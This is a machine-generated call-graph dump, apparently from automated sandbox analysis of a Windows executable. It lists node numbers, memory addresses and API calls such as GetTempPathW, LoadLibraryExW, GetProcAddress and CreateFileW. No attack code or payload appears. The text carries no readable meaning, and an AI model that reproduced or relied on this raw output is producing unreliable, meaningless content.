_invalid_parameter_noinfo 37 API calls 15743->15745 15744->15738 15745->15741 15747 7ff6e1b4cba9 15746->15747 15749 7ff6e1b43a8f 15746->15749 15747->15749 15754 7ff6e1b52454 15747->15754 15750 7ff6e1b4cbfc 15749->15750 15751 7ff6e1b4cc15 15750->15751 15753 7ff6e1b43a9f 15750->15753 15751->15753 15798 7ff6e1b517c0 15751->15798 15753->15462 15766 7ff6e1b4a650 GetLastError 15754->15766 15757 7ff6e1b524ae 15757->15749 15767 7ff6e1b4a674 FlsGetValue 15766->15767 15768 7ff6e1b4a691 FlsSetValue 15766->15768 15769 7ff6e1b4a68b 15767->15769 15785 7ff6e1b4a681 15767->15785 15770 7ff6e1b4a6a3 15768->15770 15768->15785 15769->15768 15772 7ff6e1b4dd70 memcpy_s 11 API calls 15770->15772 15771 7ff6e1b4a6fd SetLastError 15773 7ff6e1b4a70a 15771->15773 15774 7ff6e1b4a71d 15771->15774 15775 7ff6e1b4a6b2 15772->15775 15773->15757 15788 7ff6e1b4f7b8 EnterCriticalSection 15773->15788 15789 7ff6e1b4923c 15774->15789 15777 7ff6e1b4a6d0 FlsSetValue 15775->15777 15778 7ff6e1b4a6c0 FlsSetValue 15775->15778 15779 7ff6e1b4a6dc FlsSetValue 15777->15779 15780 7ff6e1b4a6ee 15777->15780 15782 7ff6e1b4a6c9 15778->15782 15779->15782 15783 7ff6e1b4a3f4 memcpy_s 11 API calls 15780->15783 15784 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15782->15784 15786 7ff6e1b4a6f6 15783->15786 15784->15785 15785->15771 15787 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15786->15787 15787->15771 15790 7ff6e1b527a0 _CallSETranslator EnterCriticalSection LeaveCriticalSection 15789->15790 15791 7ff6e1b49245 15790->15791 15792 7ff6e1b49254 15791->15792 15793 7ff6e1b527f0 _CallSETranslator 44 API calls 15791->15793 15794 7ff6e1b4925d IsProcessorFeaturePresent 15792->15794 15795 7ff6e1b49287 _CallSETranslator 15792->15795 15793->15792 15796 7ff6e1b4926c 15794->15796 15797 7ff6e1b49b14 _wfindfirst32i64 14 API calls 15796->15797 15797->15795 15799 7ff6e1b4a650 _CallSETranslator 45 API calls 15798->15799 15800 7ff6e1b517c9 15799->15800 15808 7ff6e1b4431c EnterCriticalSection 15801->15808 15810 7ff6e1b324ec 15809->15810 15811 7ff6e1b43c14 49 API calls 15810->15811 15812 7ff6e1b3253d 15811->15812 15813 7ff6e1b44474 memcpy_s 11 API calls 15812->15813 15814 7ff6e1b32542 15813->15814 15828 7ff6e1b44494 15814->15828 15817 7ff6e1b31b30 49 API calls 15818 7ff6e1b32571 memcpy_s 15817->15818 15819 7ff6e1b37a60 57 API calls 15818->15819 15820 7ff6e1b325a6 15819->15820 15821 7ff6e1b325ab 15820->15821 15822 7ff6e1b325e3 MessageBoxA 15820->15822 15824 7ff6e1b37a60 57 API calls 15821->15824 15823 7ff6e1b325fd 15822->15823 15825 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15823->15825 15826 7ff6e1b325c5 MessageBoxW 15824->15826 15827 7ff6e1b3260d 15825->15827 15826->15823 15827->15148 15829 7ff6e1b4a7c8 memcpy_s 11 API calls 15828->15829 15830 7ff6e1b444ab 15829->15830 15831 7ff6e1b32549 15830->15831 15832 7ff6e1b4dd70 memcpy_s 11 API calls 15830->15832 15834 7ff6e1b444eb 15830->15834 15831->15817 15833 7ff6e1b444e0 15832->15833 15835 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15833->15835 15834->15831 15840 7ff6e1b4e448 15834->15840 15835->15834 15838 7ff6e1b49e00 _wfindfirst32i64 17 API calls 15839 7ff6e1b44530 15838->15839 15844 7ff6e1b4e465 15840->15844 15841 7ff6e1b4e46a 15842 7ff6e1b44511 15841->15842 15843 7ff6e1b44474 memcpy_s 11 API calls 15841->15843 15842->15831 15842->15838 15845 7ff6e1b4e474 15843->15845 15844->15841 15844->15842 15847 7ff6e1b4e4b4 15844->15847 15846 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15845->15846 15846->15842 15847->15842 15848 7ff6e1b44474 memcpy_s 11 API calls 15847->15848 15848->15845 15850 7ff6e1b37b94 WideCharToMultiByte 15849->15850 15851 7ff6e1b37c02 WideCharToMultiByte 15849->15851 15853 7ff6e1b37bbe 15850->15853 15854 7ff6e1b37bd5 15850->15854 15852 7ff6e1b37c2f 15851->15852 15859 7ff6e1b33c25 15851->15859 15855 7ff6e1b32620 57 API calls 15852->15855 15856 7ff6e1b32620 57 API calls 15853->15856 15854->15851 15857 7ff6e1b37beb 15854->15857 15855->15859 15856->15859 15858 7ff6e1b32620 57 API calls 15857->15858 15858->15859 15859->15157 15859->15159 15861 7ff6e1b49153 15860->15861 15864 7ff6e1b36a2e 15860->15864 15862 7ff6e1b491dc __std_exception_copy 37 API calls 15861->15862 15861->15864 15863 7ff6e1b49180 15862->15863 15863->15864 15865 7ff6e1b49e00 _wfindfirst32i64 17 API calls 15863->15865 15864->15178 15866 7ff6e1b491b0 15865->15866 15868 7ff6e1b317e4 15867->15868 15869 7ff6e1b317d4 15867->15869 15871 7ff6e1b37230 83 API calls 15868->15871 15873 7ff6e1b31842 15868->15873 15870 7ff6e1b33cd0 116 API calls 15869->15870 15870->15868 15872 7ff6e1b31815 15871->15872 15872->15873 15901 7ff6e1b3f964 15872->15901 15875 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15873->15875 15877 7ff6e1b319c0 15875->15877 15876 7ff6e1b3182b 15878 7ff6e1b3184c 15876->15878 15879 7ff6e1b3182f 15876->15879 15877->15192 15877->15194 15905 7ff6e1b3f62c 15878->15905 15881 7ff6e1b324d0 59 API calls 15879->15881 15881->15873 15883 7ff6e1b31867 15885 7ff6e1b324d0 59 API calls 15883->15885 15884 7ff6e1b3f964 73 API calls 15886 7ff6e1b318d1 15884->15886 15885->15873 15887 7ff6e1b318fe 15886->15887 15888 7ff6e1b318e3 15886->15888 15889 7ff6e1b3f62c _fread_nolock 53 API calls 15887->15889 15890 7ff6e1b324d0 59 API calls 15888->15890 15891 7ff6e1b31913 15889->15891 15890->15873 15891->15883 15892 7ff6e1b31925 15891->15892 15908 7ff6e1b3f3a0 15892->15908 15895 7ff6e1b3193d 15896 7ff6e1b32770 59 API calls 15895->15896 15896->15873 15897 7ff6e1b3f2dc 74 API calls 15897->15873 15898 7ff6e1b31950 15899 7ff6e1b31993 15898->15899 15900 7ff6e1b32770 59 API calls 15898->15900 15899->15873 15899->15897 15900->15899 15902 7ff6e1b3f994 15901->15902 15914 7ff6e1b3f6f4 15902->15914 15904 7ff6e1b3f9ad 15904->15876 15926 7ff6e1b3f64c 15905->15926 15909 7ff6e1b3f3a9 15908->15909 15913 7ff6e1b31939 15908->15913 15910 7ff6e1b44474 memcpy_s 11 API calls 15909->15910 15911 7ff6e1b3f3ae 15910->15911 15912 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15911->15912 15912->15913 15913->15895 15913->15898 15915 7ff6e1b3f75e 15914->15915 15916 7ff6e1b3f71e 15914->15916 15915->15916 15918 7ff6e1b3f76a 15915->15918 15917 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15916->15917 15924 7ff6e1b3f745 15917->15924 15925 7ff6e1b4431c EnterCriticalSection 15918->15925 15924->15904 15927 7ff6e1b3f676 15926->15927 15928 7ff6e1b31861 15926->15928 15927->15928 15929 7ff6e1b3f685 memcpy_s 15927->15929 15930 7ff6e1b3f6c2 15927->15930 15928->15883 15928->15884 15932 7ff6e1b44474 memcpy_s 11 API calls 15929->15932 15939 7ff6e1b4431c EnterCriticalSection 15930->15939 15934 7ff6e1b3f69a 15932->15934 15937 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15934->15937 15937->15928 16033 7ff6e1b36740 15940->16033 15942 7ff6e1b31454 15943 7ff6e1b31459 15942->15943 16042 7ff6e1b36a60 15942->16042 15943->15206 15946 7ff6e1b314a7 15949 7ff6e1b314e0 15946->15949 15952 7ff6e1b33cd0 116 API calls 15946->15952 15947 7ff6e1b31487 15948 7ff6e1b324d0 59 API calls 15947->15948 15951 7ff6e1b3149d 15948->15951 15950 7ff6e1b3f964 73 API calls 15949->15950 15953 7ff6e1b314f2 15950->15953 15951->15206 15954 7ff6e1b314bf 15952->15954 15956 7ff6e1b31516 15953->15956 15957 7ff6e1b314f6 15953->15957 15954->15949 15955 7ff6e1b314c7 15954->15955 15958 7ff6e1b32770 59 API calls 15955->15958 15960 7ff6e1b3151c 15956->15960 15961 7ff6e1b31534 15956->15961 15959 7ff6e1b324d0 59 API calls 15957->15959 15968 7ff6e1b314d6 __std_exception_destroy 15958->15968 15959->15968 16067 7ff6e1b31050 15960->16067 15963 7ff6e1b31556 15961->15963 15973 7ff6e1b31575 15961->15973 15965 7ff6e1b324d0 59 API calls 15963->15965 15964 7ff6e1b31624 15967 7ff6e1b3f2dc 74 API calls 15964->15967 15965->15968 15966 7ff6e1b3f2dc 74 API calls 15966->15964 15967->15951 15968->15964 15968->15966 15969 7ff6e1b3f62c _fread_nolock 53 API calls 15969->15973 15970 7ff6e1b315d5 15972 7ff6e1b324d0 59 API calls 15970->15972 15972->15968 15973->15968 15973->15969 15973->15970 16085 7ff6e1b3fd6c 15973->16085 15975 7ff6e1b329c6 15974->15975 15976 7ff6e1b31b30 49 API calls 15975->15976 15978 7ff6e1b329fb 15976->15978 15977 7ff6e1b32e01 15978->15977 15979 7ff6e1b33b40 49 API calls 15978->15979 15980 7ff6e1b32a6f 15979->15980 16663 7ff6e1b32e20 15980->16663 15983 7ff6e1b32aea 15985 7ff6e1b32e20 75 API calls 15983->15985 15984 7ff6e1b32ab1 15986 7ff6e1b36740 98 API calls 15984->15986 15987 7ff6e1b32b3c 15985->15987 15988 7ff6e1b32ab9 15986->15988 15989 7ff6e1b32ba6 15987->15989 15990 7ff6e1b32b40 15987->15990 15991 7ff6e1b32ada 15988->15991 16671 7ff6e1b36620 15988->16671 15992 7ff6e1b32e20 75 API calls 15989->15992 15993 7ff6e1b36740 98 API calls 15990->15993 15994 7ff6e1b32770 59 API calls 15991->15994 15998 7ff6e1b32ae3 15991->15998 15996 7ff6e1b32bd2 15992->15996 15997 7ff6e1b32b48 15993->15997 15994->15998 15999 7ff6e1b32c32 15996->15999 16000 7ff6e1b32e20 75 API calls 15996->16000 15997->15991 16001 7ff6e1b36620 138 API calls 15997->16001 16003 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15998->16003 15999->15977 16002 7ff6e1b36740 98 API calls 15999->16002 16005 7ff6e1b32c02 16000->16005 16006 7ff6e1b32b65 16001->16006 16007 7ff6e1b32c42 16002->16007 16004 7ff6e1b32b9b 16003->16004 16004->15206 16005->15999 16009 7ff6e1b32e20 75 API calls 16005->16009 16006->15991 16008 7ff6e1b32de6 16006->16008 16007->15977 16009->15999 16030 7ff6e1b317a1 16029->16030 16031 7ff6e1b31795 16029->16031 16030->15206 16032 7ff6e1b32770 59 API calls 16031->16032 16032->16030 16034 7ff6e1b36788 16033->16034 16035 7ff6e1b36752 16033->16035 16034->15942 16089 7ff6e1b316d0 16035->16089 16043 7ff6e1b36a70 16042->16043 16044 7ff6e1b31b30 49 API calls 16043->16044 16045 7ff6e1b36aa1 16044->16045 16046 7ff6e1b31b30 49 API calls 16045->16046 16059 7ff6e1b36c70 16045->16059 16049 7ff6e1b36ac8 16046->16049 16047 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 16048 7ff6e1b3147f 16047->16048 16048->15946 16048->15947 16049->16059 16613 7ff6e1b45118 16049->16613 16051 7ff6e1b36bd9 16052 7ff6e1b37a60 57 API calls 16051->16052 16054 7ff6e1b36bf1 16052->16054 16053 7ff6e1b36cab 16055 7ff6e1b33cd0 116 API calls 16053->16055 16054->16053 16058 7ff6e1b369b0 61 API calls 16054->16058 16063 7ff6e1b36c22 __std_exception_destroy 16054->16063 16055->16059 16056 7ff6e1b36c93 16057 7ff6e1b36c5f 16058->16063 16059->16047 16061 7ff6e1b36afd 16061->16051 16061->16059 16064 7ff6e1b45118 49 API calls 16061->16064 16065 7ff6e1b37a60 57 API calls 16061->16065 16066 7ff6e1b378d0 58 API calls 16061->16066 16063->16056 16063->16057 16064->16061 16065->16061 16066->16061 16068 7ff6e1b310a6 16067->16068 16069 7ff6e1b310ad 16068->16069 16070 7ff6e1b310d3 16068->16070 16071 7ff6e1b32770 59 API calls 16069->16071 16073 7ff6e1b31109 16070->16073 16074 7ff6e1b310ed 16070->16074 16072 7ff6e1b310c0 16071->16072 16072->15968 16076 7ff6e1b3111b 16073->16076 16083 7ff6e1b31137 memcpy_s 16073->16083 16075 7ff6e1b324d0 59 API calls 16074->16075 16086 7ff6e1b3fd9c 16085->16086 16648 7ff6e1b3fabc 16086->16648 16091 7ff6e1b316f5 16089->16091 16090 7ff6e1b31738 16093 7ff6e1b367a0 16090->16093 16091->16090 16092 7ff6e1b32770 59 API calls 16091->16092 16092->16090 16094 7ff6e1b367b6 16093->16094 16095 7ff6e1b3682d GetTempPathW 16094->16095 16096 7ff6e1b367da 16094->16096 16097 7ff6e1b36842 16095->16097 16098 7ff6e1b369b0 61 API calls 16096->16098 16132 7ff6e1b32470 16097->16132 16099 7ff6e1b367e6 16098->16099 16156 7ff6e1b364a0 16099->16156 16105 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 16109 7ff6e1b36906 16110 7ff6e1b3685b __std_exception_destroy 16110->16109 16116 7ff6e1b36891 16110->16116 16136 7ff6e1b4739c 16110->16136 16139 7ff6e1b378d0 16110->16139 16131 7ff6e1b368ca __std_exception_destroy 16116->16131 16131->16105 16133 7ff6e1b32495 16132->16133 16190 7ff6e1b43e68 16133->16190 16362 7ff6e1b46fc8 16136->16362 16140 7ff6e1b3ade0 16139->16140 16157 7ff6e1b364ac 16156->16157 16158 7ff6e1b37a60 57 API calls 16157->16158 16159 7ff6e1b364ce 16158->16159 16160 7ff6e1b364e9 ExpandEnvironmentStringsW 16159->16160 16161 7ff6e1b364d6 16159->16161 16162 7ff6e1b3650f __std_exception_destroy 16160->16162 16163 7ff6e1b32770 59 API calls 16161->16163 16165 7ff6e1b36526 16162->16165 16166 7ff6e1b36513 16162->16166 16164 7ff6e1b364e2 16163->16164 16167 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 16164->16167 16170 7ff6e1b36540 16165->16170 16171 7ff6e1b36534 16165->16171 16168 7ff6e1b32770 59 API calls 16166->16168 16169 7ff6e1b36608 16167->16169 16168->16164 16169->16131 16180 7ff6e1b466e4 16169->16180 16504 7ff6e1b45378 16170->16504 16497 7ff6e1b45f74 16171->16497 16181 7ff6e1b466f1 16180->16181 16182 7ff6e1b46704 16180->16182 16193 7ff6e1b43ec2 16190->16193 16191 7ff6e1b43ee7 16192 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 16191->16192 16196 7ff6e1b43f11 16192->16196 16193->16191 16194 7ff6e1b43f23 16193->16194 16208 7ff6e1b42220 16194->16208 16198 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 16196->16198 16197 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16197->16196 16201 7ff6e1b324b4 16198->16201 16200 7ff6e1b43fd0 16202 7ff6e1b44004 16200->16202 16203 7ff6e1b43fd9 16200->16203 16201->16110 16202->16197 16206 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16203->16206 16204 7ff6e1b4402a 16204->16202 16205 7ff6e1b44034 16204->16205 16207 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16205->16207 16206->16196 16207->16196 16209 7ff6e1b4225e 16208->16209 16210 7ff6e1b4224e 16208->16210 16211 7ff6e1b42267 16209->16211 16216 7ff6e1b42295 16209->16216 16212 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 16210->16212 16213 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 16211->16213 16214 7ff6e1b4228d 16212->16214 16213->16214 16214->16200 16214->16202 16214->16203 16214->16204 16216->16210 16216->16214 16219 7ff6e1b42c34 16216->16219 16252 7ff6e1b42680 16216->16252 16289 7ff6e1b41e10 16216->16289 16220 7ff6e1b42ce7 16219->16220 16221 7ff6e1b42c76 16219->16221 16222 7ff6e1b42cec 16220->16222 16223 7ff6e1b42d40 16220->16223 16224 7ff6e1b42c7c 16221->16224 16225 7ff6e1b42d11 16221->16225 16226 7ff6e1b42d21 16222->16226 16227 7ff6e1b42cee 16222->16227 16231 7ff6e1b42d57 16223->16231 16232 7ff6e1b42d4a 16223->16232 16237 7ff6e1b42d4f 16223->16237 16228 7ff6e1b42c81 16224->16228 16229 7ff6e1b42cb0 16224->16229 16308 7ff6e1b40fe4 16225->16308 16228->16231 16229->16237 16232->16225 16232->16237 16253 7ff6e1b4268e 16252->16253 16254 7ff6e1b426a4 16252->16254 16256 7ff6e1b426e4 16253->16256 16257 7ff6e1b42ce7 16253->16257 16258 7ff6e1b42c76 16253->16258 16255 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 16254->16255 16254->16256 16255->16256 16256->16216 16259 7ff6e1b42cec 16257->16259 16260 7ff6e1b42d40 16257->16260 16261 7ff6e1b42c7c 16258->16261 16262 7ff6e1b42d11 16258->16262 16345 7ff6e1b40258 16289->16345 16346 7ff6e1b4028d 16345->16346 16347 7ff6e1b4029f 16345->16347 16348 7ff6e1b44474 memcpy_s 11 API calls 16346->16348 16350 7ff6e1b402ad 16347->16350 16354 7ff6e1b402e9 16347->16354 16498 7ff6e1b45f92 16497->16498 16501 7ff6e1b45fc5 16497->16501 16498->16501 16505 7ff6e1b45394 16504->16505 16506 7ff6e1b45402 16504->16506 16505->16506 16614 7ff6e1b4a650 _CallSETranslator 45 API calls 16613->16614 16615 7ff6e1b4512d 16614->16615 16616 7ff6e1b4eec7 16615->16616 16620 7ff6e1b4ede6 16615->16620 16635 7ff6e1b3af44 16616->16635 16619 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 16621 7ff6e1b4eebf 16619->16621 16620->16619 16621->16061 16638 7ff6e1b3af58 IsProcessorFeaturePresent 16635->16638 16639 7ff6e1b3af6f 16638->16639 16644 7ff6e1b3aff4 RtlCaptureContext RtlLookupFunctionEntry 16639->16644 16645 7ff6e1b3af83 16644->16645 16646 7ff6e1b3b024 RtlVirtualUnwind 16644->16646 16647 7ff6e1b3ae30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16645->16647 16646->16645 16649 7ff6e1b3fadc 16648->16649 16654 7ff6e1b3fb09 16648->16654 16649->16654 16664 7ff6e1b32e54 16663->16664 16665 7ff6e1b43c14 49 API calls 16664->16665 16666 7ff6e1b32e7a 16665->16666 16667 7ff6e1b32e8b 16666->16667 16695 7ff6e1b44e38 16666->16695 16669 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 16667->16669 16670 7ff6e1b32aad 16669->16670 16670->15983 16670->15984 16672 7ff6e1b3662e 16671->16672 16673 7ff6e1b33cd0 116 API calls 16672->16673 16674 7ff6e1b36655 16673->16674 16675 7ff6e1b36a60 136 API calls 16674->16675 16676 7ff6e1b36663 16675->16676 16696 7ff6e1b44e61 16695->16696 16697 7ff6e1b44e55 16695->16697 16737 7ff6e1b44a4c 16696->16737 16712 7ff6e1b446b0 16697->16712 16700 7ff6e1b44e5a 16700->16667 16703 7ff6e1b44e99 16748 7ff6e1b44534 16703->16748 16706 7ff6e1b44f09 16708 7ff6e1b446b0 69 API calls 16706->16708 16707 7ff6e1b44ef5 16707->16700 16710 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16707->16710 16709 7ff6e1b44f15 16708->16709 16709->16700 16711 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16709->16711 16710->16700 16711->16700 16713 7ff6e1b446e7 16712->16713 16714 7ff6e1b446ca 16712->16714 16713->16714 16716 7ff6e1b446fa CreateFileW 16713->16716 16715 7ff6e1b44454 _fread_nolock 11 API calls 16714->16715 16717 7ff6e1b446cf 16715->16717 16718 7ff6e1b4472e 16716->16718 16719 7ff6e1b44764 16716->16719 16720 7ff6e1b44474 memcpy_s 11 API calls 16717->16720 16770 7ff6e1b44804 GetFileType 16718->16770 16796 7ff6e1b44d28 16719->16796 16723 7ff6e1b446d7 16720->16723 16728 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 16723->16728 16726 7ff6e1b44798 16727 7ff6e1b4476d 16733 7ff6e1b446e2 16728->16733 16733->16700 16738 7ff6e1b44a6b 16737->16738 16739 7ff6e1b44a70 16737->16739 16738->16703 16745 7ff6e1b4dffc 16738->16745 16739->16738 16740 7ff6e1b4a650 _CallSETranslator 45 API calls 16739->16740 16741 7ff6e1b44a8b 16740->16741 16858 7ff6e1b4cb5c 16741->16858 16866 7ff6e1b4dde8 16745->16866 16749 7ff6e1b4455e 16748->16749 16750 7ff6e1b44582 16748->16750 16754 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16749->16754 16756 7ff6e1b4456d 16749->16756 16751 7ff6e1b44587 16750->16751 16752 7ff6e1b445dc 16750->16752 16751->16756 16757 7ff6e1b4459c 16751->16757 16759 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16751->16759 16875 7ff6e1b4e820 16752->16875 16754->16756 16756->16706 16756->16707 16760 7ff6e1b4cafc _fread_nolock 12 API calls 16757->16760 16759->16757 16760->16756 16771 7ff6e1b4490f 16770->16771 16772 7ff6e1b44852 16770->16772 16774 7ff6e1b44939 16771->16774 16775 7ff6e1b44917 16771->16775 16773 7ff6e1b4487e GetFileInformationByHandle 16772->16773 16777 7ff6e1b44c24 21 API calls 16772->16777 16778 7ff6e1b448a7 16773->16778 16779 7ff6e1b4492a GetLastError 16773->16779 16776 7ff6e1b4495c PeekNamedPipe 16774->16776 16795 7ff6e1b448fa 16774->16795 16775->16779 16780 7ff6e1b4491b 16775->16780 16776->16795 16782 7ff6e1b4486c 16777->16782 16783 7ff6e1b44ae8 51 API calls 16778->16783 16781 7ff6e1b443e8 _fread_nolock 11 API calls 16779->16781 16784 7ff6e1b44474 memcpy_s 11 API calls 16780->16784 16781->16795 16782->16773 16782->16795 16786 7ff6e1b448b2 16783->16786 16784->16795 16785 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 16788 7ff6e1b4473c 16785->16788 16795->16785 16797 7ff6e1b44d5e 16796->16797 16798 7ff6e1b44df6 __std_exception_destroy 16797->16798 16799 7ff6e1b44474 memcpy_s 11 API calls 16797->16799 16800 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 16798->16800 16801 7ff6e1b44d70 16799->16801 16802 7ff6e1b44769 16800->16802 16803 7ff6e1b44474 memcpy_s 11 API calls 16801->16803 16802->16726 16802->16727 16804 7ff6e1b44d78 16803->16804 16859 7ff6e1b44aae 16858->16859 16860 7ff6e1b4cb71 16858->16860 16862 7ff6e1b4cbc8 16859->16862 16860->16859 16861 7ff6e1b52454 45 API calls 16860->16861 16861->16859 16863 7ff6e1b4cbdd 16862->16863 16864 7ff6e1b4cbf0 16862->16864 16863->16864 16865 7ff6e1b517c0 45 API calls 16863->16865 16864->16738 16865->16864 16867 7ff6e1b4de45 16866->16867 16873 7ff6e1b4de40 __vcrt_InitializeCriticalSectionEx 16866->16873 16867->16703 16868 7ff6e1b4de75 LoadLibraryExW 16870 7ff6e1b4df4a 16868->16870 16871 7ff6e1b4de9a GetLastError 16868->16871 16869 7ff6e1b4df6a GetProcAddress 16869->16867 16870->16869 16872 7ff6e1b4df61 FreeLibrary 16870->16872 16871->16873 16872->16869 16873->16867 16873->16868 16873->16869 16874 7ff6e1b4ded4 LoadLibraryExW 16873->16874 16874->16870 16874->16873 16877 7ff6e1b4e829 MultiByteToWideChar 16875->16877 16905 7ff6e1b491bd 16904->16905 16906 7ff6e1b370aa 16904->16906 16907 7ff6e1b44474 memcpy_s 11 API calls 16905->16907 16910 7ff6e1b46f28 16906->16910 16908 7ff6e1b491c2 16907->16908 16911 7ff6e1b46f46 16910->16911 16912 7ff6e1b46f31 16910->16912 16923 7ff6e1b4542c 16922->16923 16924 7ff6e1b45452 16923->16924 16927 7ff6e1b45485 16923->16927 16925 7ff6e1b44474 memcpy_s 11 API calls 16924->16925 16926 7ff6e1b45457 16925->16926 16928 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 16926->16928 16929 7ff6e1b45498 16927->16929 16930 7ff6e1b4548b 16927->16930 16931 7ff6e1b33d29 16928->16931 16941 7ff6e1b4a128 16929->16941 16932 7ff6e1b44474 memcpy_s 11 API calls 16930->16932 16931->15260 16932->16931 16954 7ff6e1b4f7b8 EnterCriticalSection 16941->16954 17302 7ff6e1b47998 17301->17302 17305 7ff6e1b47474 17302->17305 17304 7ff6e1b479b1 17304->15270 17306 7ff6e1b4748f 17305->17306 17307 7ff6e1b474be 17305->17307 17308 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 17306->17308 17315 7ff6e1b4431c EnterCriticalSection 17307->17315 17310 7ff6e1b474af 17308->17310 17310->17304 17317 7ff6e1b3f101 17316->17317 17318 7ff6e1b3f0d3 17316->17318 17325 7ff6e1b3f0f3 17317->17325 17326 7ff6e1b4431c EnterCriticalSection 17317->17326 17319 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 17318->17319 17319->17325 17325->15274 17328 7ff6e1b312f8 17327->17328 17329 7ff6e1b312c6 17327->17329 17330 7ff6e1b3f964 73 API calls 17328->17330 17331 7ff6e1b33cd0 116 API calls 17329->17331 17332 7ff6e1b3130a 17330->17332 17333 7ff6e1b312d6 17331->17333 17334 7ff6e1b3130e 17332->17334 17335 7ff6e1b3132f 17332->17335 17333->17328 17336 7ff6e1b312de 17333->17336 17338 7ff6e1b324d0 59 API calls 17334->17338 17341 7ff6e1b31364 17335->17341 17342 7ff6e1b31344 17335->17342 17337 7ff6e1b32770 59 API calls 17336->17337 17339 7ff6e1b312ee 17337->17339 17340 7ff6e1b31325 17338->17340 17339->15298 17340->15298 17344 7ff6e1b3137e 17341->17344 17350 7ff6e1b31395 17341->17350 17343 7ff6e1b324d0 59 API calls 17342->17343 17349 7ff6e1b3135f __std_exception_destroy 17343->17349 17345 7ff6e1b31050 98 API calls 17344->17345 17345->17349 17346 7ff6e1b31421 17346->15298 17347 7ff6e1b3f62c _fread_nolock 53 API calls 17347->17350 17348 7ff6e1b3f2dc 74 API calls 17348->17346 17349->17346 17349->17348 17350->17347 17350->17349 17351 7ff6e1b313de 17350->17351 17352 7ff6e1b324d0 59 API calls 17351->17352 17352->17349 17354 7ff6e1b31b30 49 API calls 17353->17354 17355 7ff6e1b33d80 17354->17355 17355->15300 17357 7ff6e1b316ab 17356->17357 17358 7ff6e1b31669 17356->17358 17357->15309 17358->17357 17359 7ff6e1b32770 59 API calls 17358->17359 17360 7ff6e1b316bf 17359->17360 17360->15309 17362 7ff6e1b37a60 57 API calls 17361->17362 17363 7ff6e1b371f7 LoadLibraryExW 17362->17363 17364 7ff6e1b37214 __std_exception_destroy 17363->17364 17364->15325 17366 7ff6e1b35f99 17365->17366 17367 7ff6e1b35fbc GetProcAddress 17365->17367 17370 7ff6e1b32620 57 API calls 17366->17370 17367->17366 17368 7ff6e1b35fe1 GetProcAddress 17367->17368 17368->17366 17369 7ff6e1b36006 GetProcAddress 17368->17369 17369->17366 17371 7ff6e1b3602e GetProcAddress 17369->17371 17372 7ff6e1b35fac 17370->17372 17371->17366 17373 7ff6e1b36056 GetProcAddress 17371->17373 17372->15332 17373->17366 17424->15340 17425->15343 17427 7ff6e1b34990 17426->17427 17428 7ff6e1b31b30 49 API calls 17427->17428 17429 7ff6e1b349c2 17428->17429 17430 7ff6e1b349eb 17429->17430 17431 7ff6e1b349cb 17429->17431 17433 7ff6e1b34a42 17430->17433 17435 7ff6e1b33d50 49 API calls 17430->17435 17432 7ff6e1b32770 59 API calls 17431->17432 17453 7ff6e1b349e1 17432->17453 17434 7ff6e1b33d50 49 API calls 17433->17434 17436 7ff6e1b34a5b 17434->17436 17437 7ff6e1b34a0c 17435->17437 17438 7ff6e1b34a79 17436->17438 17441 7ff6e1b32770 59 API calls 17436->17441 17439 7ff6e1b34a2a 17437->17439 17443 7ff6e1b32770 59 API calls 17437->17443 17442 7ff6e1b371e0 58 API calls 17438->17442 17511 7ff6e1b33c60 17439->17511 17440 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 17445 7ff6e1b330de 17440->17445 17441->17438 17446 7ff6e1b34a86 17442->17446 17443->17439 17445->15352 17454 7ff6e1b34d00 17445->17454 17448 7ff6e1b34aad 17446->17448 17449 7ff6e1b34a8b 17446->17449 17517 7ff6e1b33e10 GetProcAddress 17448->17517 17450 7ff6e1b32620 57 API calls 17449->17450 17450->17453 17452 7ff6e1b371e0 58 API calls 17452->17433 17453->17440 17455 7ff6e1b369b0 61 API calls 17454->17455 17456 7ff6e1b34d15 17455->17456 17457 7ff6e1b34d30 17456->17457 17459 7ff6e1b32890 59 API calls 17456->17459 17458 7ff6e1b37a60 57 API calls 17457->17458 17460 7ff6e1b34d74 17458->17460 17459->17457 17461 7ff6e1b34d79 17460->17461 17462 7ff6e1b34d90 17460->17462 17463 7ff6e1b32770 59 API calls 17461->17463 17465 7ff6e1b37a60 57 API calls 17462->17465 17464 7ff6e1b34d85 17463->17464 17464->15354 17466 7ff6e1b34dc5 17465->17466 17468 7ff6e1b31b30 49 API calls 17466->17468 17480 7ff6e1b34dca __std_exception_destroy 17466->17480 17467 7ff6e1b32770 59 API calls 